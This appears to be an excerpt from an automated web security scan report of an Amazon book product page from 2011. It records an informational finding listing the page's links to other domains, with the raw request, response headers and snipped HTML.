<img src="http://g-ecx.images-amazon.com/images/G/01/ui/loadIndicators/loadIndicator-large._V192195480_.gif" style="padding:8px 0px 0px 100px" />
</div>
...[SNIP]...
<div width="100%" style="display: none;" class="loading_ind">
<img style="padding: 8px 0px 0px 100px;" src="http://g-ecx.images-amazon.com/images/G/01/ui/loadIndicators/loading-large_boxed._V192195297_.gif"/>
</div>
...[SNIP]...
<div width="100%" style="display: none;" class="loading_ind">
<img style="padding: 8px 0px 0px 100px;" src="http://g-ecx.images-amazon.com/images/G/01/ui/loadIndicators/loading-large_boxed._V192195297_.gif"/>
</div>
...[SNIP]...
<div style="background-color:#eff7fe;border:1px solid #0f3c6d;padding:10px;text-align:left;" class="small">
<img src="http://g-ecx.images-amazon.com/images/G/01/x-locale/communities/reputation/suggestionbox._V192249929_.gif" width="1" align="left" height="1" border="0" />
<div name="hmdFormDiv" id="hmdFormDiv">
...[SNIP]...
<td>
    <img src="http://g-ecx.images-amazon.com/images/G/01/icons/orange-arrow._V192570247_.gif" width="5" align="absmiddle" height="9" border="0" />
    If you need help or have a question for Customer Service, <a href="/gp/help/customer/display.html/ref=cm_r8n_hmd_contact?ie=UTF8&amp;nodeId=518316">
...[SNIP]...
<td>
           
   
                                                               <img src="http://g-ecx.images-amazon.com/images/G/01/icons/orange-arrow._V192570247_.gif" width="5" align="absmiddle" height="9" border="0" />&nbsp;Would you like to <b>
...[SNIP]...
<td>
    <img src="http://g-ecx.images-amazon.com/images/G/01/icons/orange-arrow._V192570247_.gif" width="5" align="absmiddle" height="9" border="0" />

Is there any other feedback you would like to provide?


    <b>
...[SNIP]...
<a href="/ref=footer_logo/192-2919974-2112928"><img src="http://g-ecx.images-amazon.com/images/G/01/gno/images/general/navAmazonLogoFooter._V192570482_.gif" width="126" alt="amazon.com" height="24" border="0" /></a>
...[SNIP]...
<div class="navFooterLine navFooterLinkLine navFooterPadItemLine">
<a href="http://www.amazon.ca">Canada</a>
<a href="http://www.amazon.cn">China</a>
<a href="http://www.amazon.fr">France</a>
<a href="http://www.amazon.de">Germany</a>
<a href="http://www.amazon.it">Italy</a>
...[SNIP]...
<td class="navFooterDescItem"><a href="http://www.audible.com">Audible<br/>
...[SNIP]...
<td class="navFooterDescItem"><a href="http://www.dpreview.com">DPReview<br/>
...[SNIP]...
<td class="navFooterDescItem"><a href="http://www.endless.com">Endless<br/>
...[SNIP]...
<td class="navFooterDescItem"><a href="http://www.fabric.com">Fabric<br/>
...[SNIP]...
<td class="navFooterDescItem"><a href="http://www.imdb.com">IMDb<br/>
...[SNIP]...
<td class="navFooterDescItem"><a href="http://www.shopbop.com/welcome">Shopbop<br/>
...[SNIP]...
<td class="navFooterDescItem"><a href="http://www.smallparts.com">Small Parts<br/>
...[SNIP]...
<td class="navFooterDescItem"><a href="http://www.warehousedeals.com">Warehouse Deals<br/>
...[SNIP]...
<td class="navFooterDescItem"><a href="http://www.woot.com">Woot<br/>
...[SNIP]...
<td class="navFooterDescItem"><a href="http://www.zappos.com">Zappos<br/>
...[SNIP]...

22.371. http://www.amazon.com/gp/product/0470650923

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.amazon.com
Path:   /gp/product/0470650923

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /gp/product/0470650923?ie=UTF8&tag=varioussite07-20&linkCode=as2&camp=1789&creative=9325&creativeASIN=0470650923 HTTP/1.1
Host: www.amazon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 15:58:17 GMT
Server: Server
x-amz-id-1: 0WMQ1C7H1D0AGKM4JZ35
p3p: policyref="http://www.amazon.com/w3c/p3p.xml",CP="CAO DSP LAW CUR ADM IVAo IVDo CONo OTPo OUR DELi PUBi OTRi BUS PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA HEA PRE LOC GOV OTC "
x-amz-id-2: bH4rWyrYTsK4LZHmIL2ieAlYS+RL6u1roVnOdufNe10qdsKkCFlEhxaaALRAW9TF
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=ISO-8859-1
Set-cookie: session-id-time=2082787201l; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
Set-cookie: session-id=179-7922704-8063117; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
Set-cookie: UserPref=k2EotcbhQScFMoytBcrIxmHgnPNpuzpA6olZEOZF3c3avha9FTSDhBROGhxh09DKOsjhCTS+UlVnW8kpSMCf5Xroy6dEDSfUW+lrumyfdtHas7r757Mo/Ni4/uRq0iwXW7i8V/G/X+HAPXlaEp95MpawVpHN53sM6EXbX6oX8Orcenrptf5pCNYQVoHDYwGKHKEFtdCzNEVh1IUXehUen6ZZMDinb3x4G8QY2Iu5kHKINKQ9tJrldJDmIEW7TyEk9+eTO7BtSR14C7GgcUNmzkuJOLOjhU43jJAmKz9J7FlJTiQSm3PaKjoPJphlOSWLM7viicgkAsVU11beNYcVrU2X1XTpTWCO6g8EPZaIFTHlJFdt1V/pYM3KErWf9DN8xfB2KNs91KVHsV3DsHLVefEhXx1LM7kfHlvrcEJbgaA9X8E+2SRvaBlCokfFzIMyjdsn7NtwDtI=; path=/; domain=.amazon.com; expires=Sun Feb 06 15:58:17 2011 GMT
Content-Length: 413553


<html>
<head>


<style type="text/css"><!--


BODY { font-
...[SNIP]...
</style>


                <link rel="stylesheet" type="text/css" href="http://z-ecx.images-amazon.com/images/G/01/browser-scripts/fruitCSS/US-combined-1434113735.css._V175075384_.css" />


<link rel="stylesheet" type="text/css" href="http://z-ecx.images-amazon.com/images/G/01/nav2/gamma/dpCSS/US/combined-3484246616._V196377856_.css" />


<noscript><link type="text/css" rel="stylesheet" href="http://z-ecx.images-amazon.com/images/G/01/x-locale/communities/profile/customer-popover/style-no-js-3._V248984171_.css" /></noscript>

<link rel="stylesheet" type="text/css" href="http://z-ecx.images-amazon.com/images/G/01/kitchen/scheduled-delivery/sd_style-v1.1.1.0._V200598425_.css"/>


<link rel="stylesheet" type="text/css" href="http://z-ecx.images-amazon.com/images/G/01/browser-scripts/accessoriesCSS/US-combined-2965960588.css._V172139020_.css" />


   <link rel="stylesheet" type="text/css" href=http://z-ecx.images-amazon.com/images/G/01/productAds/css/detailPageStatic._V175408788_.css />

<style type="text/css">
...[SNIP]...
</style>


<link type='text/css' href='http://z-ecx.images-amazon.com/images/G/01/browser-scripts/us-site-wide-1.2.6/site-wide-5869551106.css._V171084207_.css' rel='stylesheet'>
<link type='text/css' href='http://z-ecx.images-amazon.com/images/G/01/x-locale/communities/profile/customer-popover/style-4._V196325517_.css' rel='stylesheet'>
<link type='text/css' href='http://z-ecx.images-amazon.com/images/G/01/browser-scripts/dpMergedOverallCSS/dpMergedOverallCSS-8314507502.css._V196183329_.css' rel='stylesheet'>
<link type='text/css' href='http://z-ecx.images-amazon.com/images/G/01/nav2/gamma/ciuCSS/ciuCSS-ciuAnnotations-155.css._V174809499_.css' rel='stylesheet'>
<style type="text/css">
...[SNIP]...
</title>

<link title="Amazon Search Suggestions" rel="search" type="application/opensearchdescription+xml" href="http://d2lo25i6d3q8zm.cloudfront.net/browser-plugins/AmazonSearchSuggestionsOSD.DPIE.xml">


<!--[if IE]>
...[SNIP]...
</script>
<img src="http://g-ecx.images-amazon.com/images/G/01/gno/images/orangeBlue/navPackedSprites-US-16piv._V172849515_.png" style="display:none" alt=""/>
<img src="http://g-ecx.images-amazon.com/images/G/01/x-locale/common/transparent-pixel._V192234675_.gif" style="display:none" alt=""/>


<!--Pilu -->
...[SNIP]...
<div id="rwImages_hidden" style="display:none;">
<img src="http://ecx.images-amazon.com/images/I/41L0tdeaY2L._BO2,204,203,200_PIsitb-sticker-arrow-click,TopRight,35,-76_AA300_SH20_OU01_.jpg" style="display:none;"/>
</div>
...[SNIP]...
<td><img src="http://g-ecx.images-amazon.com/images/G/01/x-locale/subscriptions/rcxsubs/dp/dp-corner-tl._V192253278_.gif" width="5" height="5" border="0" /></td>
<td class="subsDPTableTop"><img src="http://g-ecx.images-amazon.com/images/G/01/misc/transparent-pixel._V192551059_.gif" width="1" height="1" border="0" /></td>
<td><img src="http://g-ecx.images-amazon.com/images/G/01/x-locale/subscriptions/rcxsubs/dp/dp-corner-tr._V192253274_.gif" width="5" height="5" border="0" /></td>
...[SNIP]...
<td class="subsDPTableLeft"><img src="http://g-ecx.images-amazon.com/images/G/01/misc/transparent-pixel._V192551059_.gif" width="1" height="1" border="0" /></td>
...[SNIP]...
<td class="subsDPTableRight"><img src="http://g-ecx.images-amazon.com/images/G/01/misc/transparent-pixel._V192551059_.gif" width="1" height="1" border="0" /></td>
...[SNIP]...
<td><img src="http://g-ecx.images-amazon.com/images/G/01/x-locale/subscriptions/rcxsubs/dp/dp-corner-bl._V192199724_.gif" width="5" height="5" border="0" /></td>
<td class="subsDPTableBottom"><img src="http://g-ecx.images-amazon.com/images/G/01/misc/transparent-pixel._V192551059_.gif" width="1" height="1" border="0" /></td>
<td><img src="http://g-ecx.images-amazon.com/images/G/01/x-locale/subscriptions/rcxsubs/dp/dp-corner-br._V192253272_.gif" width="5" height="5" border="0" /></td>
...[SNIP]...
<td class="bottomLeft">
<img src="http://g-ecx.images-amazon.com/images/G/01/kindle/cascade/read-first-chapter-free._V201174422_.png" id="kindleReaderSampleButton" style="cursor:pointer"/>
</td>
...[SNIP]...
<a href="https://www.amazon.com/gp/tradein/add-to-cart.html/ref=trade_new_dp_trade_btn?ie=UTF8&asin=0470650923"><img src="http://g-ecx.images-amazon.com/images/G/01/tradein/buttons/button_tradein_here._V192193387_.gif" width="84" align="absmiddle" height="17" border="0" /></a>
...[SNIP]...
<a href="/gp/reader/0470650923/ref=sib_dp_pt#reader-link" onclick="if (typeof(SitbReader) != 'undefined') { SitbReader.LightboxActions.openReader('sib_dp_pt'); return false; }"><img onload="if (typeof uet == 'function') { uet('af'); }" src="http://ecx.images-amazon.com/images/I/41L0tdeaY2L._BO2,204,203,200_PIsitb-sticker-arrow-click,TopRight,35,-76_AA300_SH20_OU01_.jpg" id="prodImage" width="300" height="300" onMouseOver="sitb_showLayer('bookpopover'); return false;" onMouseOut="sitb_doHide('bookpopover'); return false;" border="0" alt="Professional Silverlight 4 (Wrox Programmer to Programmer)" onmouseover="" /></a>
...[SNIP]...
on.com/gp/student/signup/info&token=3A0F170E7CEFE27BDC730D3D7344512BC1296B83&pf_rd_m=ATVPDKIKX0DER&pf_rd_s=product-alert&pf_rd_r=0WMQ1C7H1D0AGKM4JZ35&pf_rd_t=201&pf_rd_p=1284419222&pf_rd_i=0470650923"><img src="http://g-ecx.images-amazon.com/images/G/01/books/student/50_amazon_student._V187616879_.gif" width="50" align="left" alt="Textbook Student" height="37" border="0" /></a>
...[SNIP]...
<div style="float: left; width: 75px; padding-right: 8px;"><img src="http://g-ecx.images-amazon.com/images/G/01/Books/grutty/burst/buyback_75-b._SS75_V174666444_.gif" width="75" height="75" border="0" /></div>
...[SNIP]...
<span>&nbsp;&nbsp;<a target="_new" href="http://rd.a9.com/srv/redirect/?info=AMuK3WTjek7KOD8NVFoBBdu6uW6-JS8A8u896NkYCvmleo0Gqy.5vXoBvuH8CY7FeSNAtCRln3wZe9N3fCPo7SwhW22qqztVAWq9L2iJYLEj5j5T2NAGW0eo4uZ4HJ3aeyQk109Q8bf3NiHTWk2ob9HDT1QazZviXO3-L61wOvvWWwcJLfiVXcYt5qr.R3bGboSfU06Jdoj0rz05yZgx.xioGH.hBDZSsI3kj-Fo50KJRQf947s6cJ3IbDr4mOKzFI.OQDHoTIQGX5gxGFYNh2osDvMJSgVN6iTesWCMfuEmSXHfy.os76iLrG1HbWcL67wBnVwNfm.wNHuHOwiVzSc3bR2YHhUKFQ.GDV8FDrMf6AnNOMDrew9GPR-ooQ7VGrDpmyvDW5k.UftNXlMVayrCdVvY0vpg87PH.MXXNv4FPxFS5ZmQnBEh3k5INLchw1sxx-IfOOpcGPkzJFKV-j0i7mox858W1Q__&awt=1&s=" rel="nofollow">60+ <b>
...[SNIP]...
</a>
<a target="_new" href="http://rd.a9.com/srv/redirect/?info=AMuK3WTjek7KOD8NVFoBBdu6uW6-JS8A8u896NkYCvmleo0Gqy.5vXoBvuH8CY7FeSNAtCRln3wZe9N3fCPo7SwhW22qqztVAWq9L2iJYLEj5j5T2NAGW0eo4uZ4HJ3aeyQk109Q8bf3NiHTWk2ob9HDT1QazZviXO3-L61wOvvWWwcJLfiVXcYt5qr.R3bGboSfU06Jdoj0rz05yZgx.xioGH.hBDZSsI3kj-Fo50KJRQf947s6cJ3IbDr4mOKzFI.OQDHoTIQGX5gxGFYNh2osDvMJSgVN6iTesWCMfuEmSXHfy.os76iLrG1HbWcL67wBnVwNfm.wNHuHOwiVzSc3bR2YHhUKFQ.GDV8FDrMf6AnNOMDrew9GPR-ooQ7VGrDpmyvDW5k.UftNXlMVayrCdVvY0vpg87PH.MXXNv4FPxFS5ZmQnBEh3k5INLchw1sxx-IfOOpcGPkzJFKV-j0i7mox858W1Q__&awt=1&s=" rel="nofollow"><span class="Clickriver_swSprite Clickriver_s_extLink">
...[SNIP]...
<div class="SponsoredLinkDescription">
&nbsp;&nbsp;<a target="_new" href="http://rd.a9.com/srv/redirect/?info=AMuK3WTjek7KOD8NVFoBBdu6uW6-JS8A8u896NkYCvmleo0Gqy.5vXoBvuH8CY7FeSNAtCRln3wZe9N3fCPo7SwhW22qqztVAWq9L2iJYLEj5j5T2NAGW0eo4uZ4HJ3aeyQk109Q8bf3NiHTWk2ob9HDT1QazZviXO3-L61wOvvWWwcJLfiVXcYt5qr.R3bGboSfU06Jdoj0rz05yZgx.xioGH.hBDZSsI3kj-Fo50KJRQf947s6cJ3IbDr4mOKzFI.OQDHoTIQGX5gxGFYNh2osDvMJSgVN6iTesWCMfuEmSXHfy.os76iLrG1HbWcL67wBnVwNfm.wNHuHOwiVzSc3bR2YHhUKFQ.GDV8FDrMf6AnNOMDrew9GPR-ooQ7VGrDpmyvDW5k.UftNXlMVayrCdVvY0vpg87PH.MXXNv4FPxFS5ZmQnBEh3k5INLchw1sxx-IfOOpcGPkzJFKV-j0i7mox858W1Q__&awt=1&s=" rel="nofollow" class="SponsoredLinkDescriptionUrlLink">www.componentone.com/freetrial</a>
...[SNIP]...
<span>&nbsp;&nbsp;<a target="_new" href="http://rd.a9.com/srv/redirect/?info=AOHH48FUAXr-xwiPiAACFq.m5W9AVBHMTMhLRzWUhX01wkWWelr7vEZfVF85PjEhfPpdvAWGbYputjqEHcHqOUtRuhNR7nugFZRvHdoHupR5pwDc9eBUZUkiHGHO46pOFx6AYUHpsKMatWQaqYClpmnpWXJ-BVCesMu3HHJCSJkLskNfoktE84fsXHHjofsRe0lUoF2wiJhd-h-Frvz9AlukRFw2YzWdTCJEm7JUmFHk93lQflbgsIc4C3JNDV.mPxY.XPBi-tUfuocNcYRmtVxASdy6QBDX.RE9nEigQQryxRK-am.rpz6Dmlkix8IL3nupcpFeNpPJVwHSgAkI04X2CHE-OGghYUw2JTxx78oFa9Sp3IxCmF9rCbB6lFP8iLbLeWk0eODYblHuH1F9aKmZn3VLDfgrdd-1FCNoL7em3ff4OvA6qXxddfXsmIie-WCLByDbw6tUYBvynOi.jZahEqwdsiU3GVtN76rTbO0B&awt=1&s=" rel="nofollow"><b>Silverlight</b></a>
<a target="_new" href="http://rd.a9.com/srv/redirect/?info=AOHH48FUAXr-xwiPiAACFq.m5W9AVBHMTMhLRzWUhX01wkWWelr7vEZfVF85PjEhfPpdvAWGbYputjqEHcHqOUtRuhNR7nugFZRvHdoHupR5pwDc9eBUZUkiHGHO46pOFx6AYUHpsKMatWQaqYClpmnpWXJ-BVCesMu3HHJCSJkLskNfoktE84fsXHHjofsRe0lUoF2wiJhd-h-Frvz9AlukRFw2YzWdTCJEm7JUmFHk93lQflbgsIc4C3JNDV.mPxY.XPBi-tUfuocNcYRmtVxASdy6QBDX.RE9nEigQQryxRK-am.rpz6Dmlkix8IL3nupcpFeNpPJVwHSgAkI04X2CHE-OGghYUw2JTxx78oFa9Sp3IxCmF9rCbB6lFP8iLbLeWk0eODYblHuH1F9aKmZn3VLDfgrdd-1FCNoL7em3ff4OvA6qXxddfXsmIie-WCLByDbw6tUYBvynOi.jZahEqwdsiU3GVtN76rTbO0B&awt=1&s=" rel="nofollow"><span class="Clickriver_swSprite Clickriver_s_extLink">
...[SNIP]...
<div class="SponsoredLinkDescription">
&nbsp;&nbsp;<a target="_new" href="http://rd.a9.com/srv/redirect/?info=AOHH48FUAXr-xwiPiAACFq.m5W9AVBHMTMhLRzWUhX01wkWWelr7vEZfVF85PjEhfPpdvAWGbYputjqEHcHqOUtRuhNR7nugFZRvHdoHupR5pwDc9eBUZUkiHGHO46pOFx6AYUHpsKMatWQaqYClpmnpWXJ-BVCesMu3HHJCSJkLskNfoktE84fsXHHjofsRe0lUoF2wiJhd-h-Frvz9AlukRFw2YzWdTCJEm7JUmFHk93lQflbgsIc4C3JNDV.mPxY.XPBi-tUfuocNcYRmtVxASdy6QBDX.RE9nEigQQryxRK-am.rpz6Dmlkix8IL3nupcpFeNpPJVwHSgAkI04X2CHE-OGghYUw2JTxx78oFa9Sp3IxCmF9rCbB6lFP8iLbLeWk0eODYblHuH1F9aKmZn3VLDfgrdd-1FCNoL7em3ff4OvA6qXxddfXsmIie-WCLByDbw6tUYBvynOi.jZahEqwdsiU3GVtN76rTbO0B&awt=1&s=" rel="nofollow" class="SponsoredLinkDescriptionUrlLink">Microsoft.com/Web/WebMatrix</a>
...[SNIP]...
<span>&nbsp;&nbsp;<a target="_new" href="http://rd.a9.com/srv/redirect/?info=AJh.UIsAndPZ-tyA81vCehjSNOzA1sKz4Q2yyks0WIROJNFqYqbV9ia8jAvOaHR0iCv17z4V16fk75WoTP6fKXdZ3Pu7qsbaHhZkVyr7XRvqcr6Z-srM5fKKrPzM0wX8y-MEov1Fp6KQ3rWVKy9MJPXgF1EUTZ09M6Wo09bFNmpMmXkdFo82mw03phPVBGhoZzGw8jNTZEMI6QVyO3aPIXlG.9xmO762jHMRBDmoEQyzYWyfzqmSkdN1ltbkUzDa-JnxXGpAttsVXXBo-Q9Mcy0QdCSCFaDFUdSjV-YD-2zDUD7E0XudQ7tJNcKmfH9r0ysLd0BOQfWF3rBVypDgxFuXZ0JFFjhZR4KmX1r7zkdrm6mjTgkhbby9hzB2ab2rtOrENaYlXildaYS8eeOqG1nPydIcBh324YE1sBkgnf87pheezTjIQru-kSnipZrUO8S2HGg7UQ2PFjxNMq2MS6oHbjuGYyPB4mfmC4yMBAGzoXKWwkwDJ0LHCPhWO9ry-3wT-hv.bXnS&awt=1&s=" rel="nofollow"><b>
...[SNIP]...
</a>
<a target="_new" href="http://rd.a9.com/srv/redirect/?info=AJh.UIsAndPZ-tyA81vCehjSNOzA1sKz4Q2yyks0WIROJNFqYqbV9ia8jAvOaHR0iCv17z4V16fk75WoTP6fKXdZ3Pu7qsbaHhZkVyr7XRvqcr6Z-srM5fKKrPzM0wX8y-MEov1Fp6KQ3rWVKy9MJPXgF1EUTZ09M6Wo09bFNmpMmXkdFo82mw03phPVBGhoZzGw8jNTZEMI6QVyO3aPIXlG.9xmO762jHMRBDmoEQyzYWyfzqmSkdN1ltbkUzDa-JnxXGpAttsVXXBo-Q9Mcy0QdCSCFaDFUdSjV-YD-2zDUD7E0XudQ7tJNcKmfH9r0ysLd0BOQfWF3rBVypDgxFuXZ0JFFjhZR4KmX1r7zkdrm6mjTgkhbby9hzB2ab2rtOrENaYlXildaYS8eeOqG1nPydIcBh324YE1sBkgnf87pheezTjIQru-kSnipZrUO8S2HGg7UQ2PFjxNMq2MS6oHbjuGYyPB4mfmC4yMBAGzoXKWwkwDJ0LHCPhWO9ry-3wT-hv.bXnS&awt=1&s=" rel="nofollow"><span class="Clickriver_swSprite Clickriver_s_extLink">
...[SNIP]...
<div class="SponsoredLinkDescription">
&nbsp;&nbsp;<a target="_new" href="http://rd.a9.com/srv/redirect/?info=AJh.UIsAndPZ-tyA81vCehjSNOzA1sKz4Q2yyks0WIROJNFqYqbV9ia8jAvOaHR0iCv17z4V16fk75WoTP6fKXdZ3Pu7qsbaHhZkVyr7XRvqcr6Z-srM5fKKrPzM0wX8y-MEov1Fp6KQ3rWVKy9MJPXgF1EUTZ09M6Wo09bFNmpMmXkdFo82mw03phPVBGhoZzGw8jNTZEMI6QVyO3aPIXlG.9xmO762jHMRBDmoEQyzYWyfzqmSkdN1ltbkUzDa-JnxXGpAttsVXXBo-Q9Mcy0QdCSCFaDFUdSjV-YD-2zDUD7E0XudQ7tJNcKmfH9r0ysLd0BOQfWF3rBVypDgxFuXZ0JFFjhZR4KmX1r7zkdrm6mjTgkhbby9hzB2ab2rtOrENaYlXildaYS8eeOqG1nPydIcBh324YE1sBkgnf87pheezTjIQru-kSnipZrUO8S2HGg7UQ2PFjxNMq2MS6oHbjuGYyPB4mfmC4yMBAGzoXKWwkwDJ0LHCPhWO9ry-3wT-hv.bXnS&awt=1&s=" rel="nofollow" class="SponsoredLinkDescriptionUrlLink">www.accusoft.com/<b>
...[SNIP]...
<a href="http://www.amazon.com/Professional-Silverlight-Wrox-Programmer/dp/0470650923/ref=pd_bxgy_b_img_a"><img src="http://ecx.images-amazon.com/images/I/41L0tdeaY2L._SL500_PIsitb-sticker-arrow-big,TopRight,35,-73_OU01_SS75_.jpg" width="75" alt="Professional Silverlight 4 (Wrox Programmer to Programmer)" id="bxgy_img_a" height="75" border="0" /></a>
...[SNIP]...
<a href="http://www.amazon.com/Microsoft-Silverlight-Data-Services-Cookbook/dp/1847199844/ref=pd_bxgy_b_img_b"><img src="http://ecx.images-amazon.com/images/I/51ZBCnP8%2B0L._SL500_PIsitb-sticker-arrow-big,TopRight,35,-73_OU01_SS100_.jpg" width="75" alt="Microsoft Silverlight 4 Data and Services Cookbook" id="bxgy_img_b" height="75" border="0" /></a>
...[SNIP]...
<a href="http://www.amazon.com/Microsoft-Silverlight-Step/dp/073563887X/ref=pd_bxgy_b_img_c"><img src="http://ecx.images-amazon.com/images/I/51ucwGaw5gL._SL500_PIsitb-sticker-arrow-big,TopRight,35,-73_OU01_SS100_.jpg" width="75" alt="Microsoft Silverlight 4 Step by Step (Step By Step (Microsoft))" id="bxgy_img_c" height="75" border="0" /></a>
...[SNIP]...
<div class="product-image">
<img src="http://ecx.images-amazon.com/images/I/51ZBCnP8%2B0L._SL500_PIsitb-sticker-arrow-big,TopRight,35,-73_OU01_SS100_.jpg" width="100" alt="" id="" height="100" border="0" /> </div>
...[SNIP]...
<div class="product-image">
<img src="http://ecx.images-amazon.com/images/I/512N51%2BQbGL._SL500_PIsitb-sticker-arrow-big,TopRight,35,-73_OU01_SS100_.jpg" width="100" alt="" id="" height="100" border="0" /> </div>
...[SNIP]...
<div class="product-image">
<img src="http://ecx.images-amazon.com/images/I/51ucwGaw5gL._SL500_PIsitb-sticker-arrow-big,TopRight,35,-73_OU01_SS100_.jpg" width="100" alt="" id="" height="100" border="0" /> </div>
...[SNIP]...
<div class="product-image">
<img src="http://ecx.images-amazon.com/images/I/512qJmTNIXL._SL500_PIsitb-sticker-arrow-big,TopRight,35,-73_OU01_SS100_.jpg" width="100" alt="" id="" height="100" border="0" /> </div>
...[SNIP]...
<div class="product-image">
<img src="http://ecx.images-amazon.com/images/I/41QizTXOm1L._SL500_PIsitb-sticker-arrow-big,TopRight,35,-73_OU01_SS100_.jpg" width="100" alt="" id="" height="100" border="0" /> </div>
...[SNIP]...
<div class="product-image">
<img src="http://ecx.images-amazon.com/images/I/51vz6WNpVTL._SL500_PIsitb-sticker-arrow-big,TopRight,35,-73_OU01_SS100_.jpg" width="100" alt="" id="" height="100" border="0" /> </div>
...[SNIP]...
<div style="display: none" class="CustomerPopover_load"><img src="http://g-ecx.images-amazon.com/images/G/01/ui/loadIndicators/loadIndicator-label._V192195535_.gif" width="73" alt="Loading&hellip;" height="14" border="0" /></div>
...[SNIP]...
<noscript>
<link type="text/css" rel="stylesheet" href="http://z-ecx.images-amazon.com/images/G/01/x-locale/communities/profile/customer-popover/style-no-js-3._V248984171_.css" />
</noscript>
...[SNIP]...
</div>

<img src="http://g-ecx.images-amazon.com/images/G/01/x-locale/communities/reviews/cfm._V192249942_.gif" width="1" alt="" onload="if (typeof uet == 'function') { uet('cf'); }" height="1" border="0" />

<br />
...[SNIP]...
<div style="display:none;" id="cg-div">
<img onload="if (typeof uet == 'function') { uet('cg'); } window.stageMarkers.stage('amznJQ.criticalFeature', 2);" src="http://g-ecx.images-amazon.com/images/G/01/x-locale/common/transparent-pixel._V192234675_.gif" width="1" alt="" height="1" border="0" /><img onload="if (typeof uet == 'function') { uet('cg'); } window.stageMarkers.stage('amznJQ.criticalFeature', 2);" src="http://ecx.images-amazon.com/images/G/01/x-locale/common/transparent-pixel._V192234675_.gif" width="1" alt="" height="1" border="0" />
</div>
...[SNIP]...
<div class="s9DpEntity" id="s9DpEntity" style="height: 200px;"><img style='padding-left: 130px; padding-top: 20px;' src='http://g-ecx.images-amazon.com/images/G/01/ui/loadIndicators/loadIndicator-large._V192195483_.gif' alt='loading' /><noscript>
...[SNIP]...
<td valign="top" class="faceout"><img src="http://ecx.images-amazon.com/images/I/41L0tdeaY2L._SL500_PIsitb-sticker-arrow-big,TopRight,35,-73_OU01_SS75_.jpg" width="50" alt="Professional Silverlight 4 (Wrox Programmer to Programmer)" height="50" border="0" /></td>
...[SNIP]...
<a href="http://www.amazon.com/Silverlight-4-Action-Pete-Brown/dp/1935182374/ref=pd_cp_b_1_img" id="pd_cp_b_1_img_1935182374" ><img src="http://ecx.images-amazon.com/images/I/512qJmTNIXL._SL75_PIsitb-sticker-arrow-st,TopRight,8,-14_OU01_SS50_.jpg" width="50" alt="Silverlight 4 in Action" height="50" border="0" /></a>
...[SNIP]...
<a href="http://www.amazon.com/Pro-Silverlight-4-Matthew-MacDonald/dp/1430229799/ref=pd_cp_b_2_img" id="pd_cp_b_2_img_1430229799" ><img src="http://ecx.images-amazon.com/images/I/51vz6WNpVTL._SL75_PIsitb-sticker-arrow-st,TopRight,8,-14_OU01_SS50_.jpg" width="50" alt="Pro Silverlight 4 in C#" height="50" border="0" /></a>
...[SNIP]...
<a href="http://www.amazon.com/Microsoft-Silverlight-Data-Services-Cookbook/dp/1847199844/ref=pd_cp_b_3_img" id="pd_cp_b_3_img_1847199844" ><img src="http://ecx.images-amazon.com/images/I/51ZBCnP8%2B0L._SL75_PIsitb-sticker-arrow-st,TopRight,8,-14_OU01_SS50_.jpg" width="50" alt="Microsoft Silverlight 4 Data and Services Cookbook" height="50" border="0" /></a>
...[SNIP]...
<div class="loading_ind" style="text-align: center; width: 100%; display: none;">
<img src="http://g-ecx.images-amazon.com/images/G/01/ui/loadIndicators/loading-large_boxed._V192195297_.gif" width="100" alt="Loading..." height="124" border="0" />
</div>
...[SNIP]...
<div class="loading_ind" style="display:none" width="100%">
<img src="http://g-ecx.images-amazon.com/images/G/01/ui/loadIndicators/loadIndicator-large._V192195480_.gif" style="padding:8px 0px 0px 100px" />
</div>
...[SNIP]...
<div width="100%" style="display: none;" class="loading_ind">
<img style="padding: 8px 0px 0px 100px;" src="http://g-ecx.images-amazon.com/images/G/01/ui/loadIndicators/loading-large_boxed._V192195297_.gif"/>
</div>
...[SNIP]...
<div width="100%" style="display: none;" class="loading_ind">
<img style="padding: 8px 0px 0px 100px;" src="http://g-ecx.images-amazon.com/images/G/01/ui/loadIndicators/loading-large_boxed._V192195297_.gif"/>
</div>
...[SNIP]...
<div style="background-color:#eff7fe;border:1px solid #0f3c6d;padding:10px;text-align:left;" class="small">
<img src="http://g-ecx.images-amazon.com/images/G/01/x-locale/communities/reputation/suggestionbox._V192249929_.gif" width="1" align="left" height="1" border="0" />
<div name="hmdFormDiv" id="hmdFormDiv">
...[SNIP]...
<td>
    <img src="http://g-ecx.images-amazon.com/images/G/01/icons/orange-arrow._V192570247_.gif" width="5" align="absmiddle" height="9" border="0" />
    If you need help or have a question for Customer Service, <a href="/gp/help/customer/display.html/ref=cm_r8n_hmd_contact?ie=UTF8&amp;nodeId=518316">
...[SNIP]...
<td>
           
   
                                                               <img src="http://g-ecx.images-amazon.com/images/G/01/icons/orange-arrow._V192570247_.gif" width="5" align="absmiddle" height="9" border="0" />&nbsp;Would you like to <b>
...[SNIP]...
<td>
    <img src="http://g-ecx.images-amazon.com/images/G/01/icons/orange-arrow._V192570247_.gif" width="5" align="absmiddle" height="9" border="0" />

Is there any other feedback you would like to provide?


    <b>
...[SNIP]...
<a href="/ref=footer_logo/179-7922704-8063117"><img src="http://g-ecx.images-amazon.com/images/G/01/gno/images/general/navAmazonLogoFooter._V192570482_.gif" width="126" alt="amazon.com" height="24" border="0" /></a>
...[SNIP]...
<div class="navFooterLine navFooterLinkLine navFooterPadItemLine">
<a href="http://www.amazon.ca">Canada</a>
<a href="http://www.amazon.cn">China</a>
<a href="http://www.amazon.fr">France</a>
<a href="http://www.amazon.de">Germany</a>
<a href="http://www.amazon.it">Italy</a>
...[SNIP]...
<td class="navFooterDescItem"><a href="http://www.audible.com">Audible<br/>
...[SNIP]...
<td class="navFooterDescItem"><a href="http://www.dpreview.com">DPReview<br/>
...[SNIP]...
<td class="navFooterDescItem"><a href="http://www.endless.com">Endless<br/>
...[SNIP]...
<td class="navFooterDescItem"><a href="http://www.fabric.com">Fabric<br/>
...[SNIP]...
<td class="navFooterDescItem"><a href="http://www.imdb.com">IMDb<br/>
...[SNIP]...
<td class="navFooterDescItem"><a href="http://www.shopbop.com/welcome">Shopbop<br/>
...[SNIP]...
